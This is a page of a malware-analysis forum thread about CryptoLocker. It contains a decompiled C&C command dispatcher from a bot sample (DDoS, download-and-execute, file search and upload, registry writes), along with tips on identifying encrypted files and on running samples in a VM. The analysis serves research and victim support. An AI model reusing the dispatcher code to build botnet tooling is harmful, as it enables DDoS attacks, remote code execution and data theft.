A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #21912  by Artilllerie
 Fri Jan 10, 2014 11:51 am
For information here is the code of the C&C commands :
Code: Select all
string result;
	try
	{
		string_2 = string_2.Trim();
		if (string_2.ToLower().Trim().Contains("[end]"))
		{
			result = "finalized";
			return result;
		}
		if (string_2.StartsWith("writeregistry"))
		{
			string[] string_3 = string_2.Split(new char[]
			{
				'|'
			});
			result = Conversions.ToString(this.method_14(string_3));
			return result;
		}
		if (string_2.StartsWith("ddose"))
		{
			string[] string_4 = string_2.Split(new char[]
			{
				'|'
			});
			result = this.method_13(string_4);
			return result;
		}
		if (string_2.StartsWith("download"))
		{
			string[] string_5 = string_2.Split(new char[]
			{
				'|'
			});
			result = this.method_12(string_5, false);
			return result;
		}
		if (string_2.StartsWith("execute"))
		{
			string[] string_6 = string_2.Split(new char[]
			{
				'|'
			});
			result = this.method_11(string_6);
			return result;
		}
		if (string_2.StartsWith("downloadandexecute"))
		{
			string[] string_7 = string_2.Split(new char[]
			{
				'|'
			});
			result = this.method_12(string_7, true);
			return result;
		}
		if (string_2.StartsWith("disallowshutdown"))
		{
			string[] string_8 = string_2.Split(new char[]
			{
				'|'
			});
			result = this.method_10(string_8);
			return result;
		}
		if (string_2.StartsWith("searchupload"))
		{
			string[] string_9 = string_2.Split(new char[]
			{
				'|'
			});
			result = this.method_9(string_9);
			return result;
		}
		if (string_2.StartsWith("showmessage"))
		{
			string[] string_10 = string_2.Split(new char[]
			{
				'|'
			});
			result = this.method_8(string_10);
			return result;
		}
		if (string_2.StartsWith("enablesockets"))
		{
			string[] string_11 = string_2.Split(new char[]
			{
				'|'
			});
			result = Conversions.ToString(this.method_7(string_11));
			return result;
		}
Note the "ddose" command related to what Cody Johnston said above ;).
 #21917  by thisisu
 Fri Jan 10, 2014 10:05 pm
Hi all,

Can someone please take a look at this file and let me know what type of malware it came from?

Message from the user on Jan 18th, 2013:
Code: Select all
I have been attacked by a virus where all my excel, word, music files have been encrypted. My restore also sates that it has been unable to complete. When I first turned my computer on I received a message saying all my files were encrypted and sent to the police and that I would have to send £100 to get them unencrypted. I am not very computer literate so if there is a fix I would need to have clear simple detailed steps. I hope you can help as I desperately need a couple of my Excel files.
Attachments
(48.75 KiB) Downloaded 73 times
 #21918  by Fabian Wosar
 Fri Jan 10, 2014 11:55 pm
thisisu wrote:Can someone please take a look at this file and let me know what type of malware it came from?
CryptoLocker. You can easily determine it yourself:

CryptoLocker files have a 276 byte header. The header essentially contains a SHA-1 hash (20 bytes) as well as a 256 byte key blob storing the encrypted AES key. The hash is calculated over four zero bytes and the key blob. So essentially you can check if the first 20 bytes are equal sha1(0x00000000<key blob>).

I wrote a small tool to scan for CryptoLocker files or determine if a specific file is encrypted by CryptoLocker based on the above check. I use it mostly to quickly determine if files that victims sent me are encrypted by CryptoLocker or not, as most users just send encrypted files and ask for help. If there is any interest in it, I can share it with you guys.
 #21919  by thisisu
 Sat Jan 11, 2014 1:45 am
Fabian Wosar wrote:I wrote a small tool to scan for CryptoLocker files or determine if a specific file is encrypted by CryptoLocker based on the above check. I use it mostly to quickly determine if files that victims sent me are encrypted by CryptoLocker or not, as most users just send encrypted files and ask for help. If there is any interest in it, I can share it with you guys.
I'm interested. Thank you for reviewing the file. :)
 #21928  by Fabian Wosar
 Mon Jan 13, 2014 11:01 am
AliveNoMore wrote:I still can't run CryptoLocker. I've created a special VM for malware without additions, renamed devices and registry keys. What am I doing wrong? How are guys testing it?
CryptoLocker is not VM aware. Most likely your infection has a hard time finding a valid C2 server as the vast majority of domains generated by the DGA are sinkholed. Just run a sniffer on the host and check if excessive DNS traffic is taking place. If it is, the malware desperately tries to find a C2 server.
 #21939  by AliveNoMore
 Tue Jan 14, 2014 4:20 am
Fabian Wosar wrote:
AliveNoMore wrote:I still can't run CryptoLocker. I've created a special VM for malware without additions, renamed devices and registry keys. What am I doing wrong? How are guys testing it?
CryptoLocker is not VM aware. Most likely your infection has a hard time finding a valid C2 server as the vast majority of domains generated by the DGA are sinkholed. Just run a sniffer on the host and check if excessive DNS traffic is taking place. If it is, the malware desperately tries to find a C2 server.
Hm, thought it would actually be VM aware. Anyway, I suppose the only thing I can do to test it is to just let it run and hope it would manage to find a C2 server that isn't sinkholed, which could take a quite while?
 #22011  by Grinler
 Tue Jan 21, 2014 1:38 am
tjcoder wrote:Just thought I'd add this for completeness: http://www.zdnet.com/cryptolockers-crim ... 000024579/

They are using only 3 bitcoin addresses since the first infection, literally every bitcoin transaction is publicly logged by multiple parties this includes ones to exchanges and every single one leaving these 3 addresses, yet they've cashed out literally tens of millions of USD and nobody knows who they are or even where on earth they are located.. Someone is extremely lazy or hiding something and it's not the authors of this malware..
When Crilock infects a computer it generates a new bitcoin address. Only in the beginning were they using static addresses.
  • 1
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12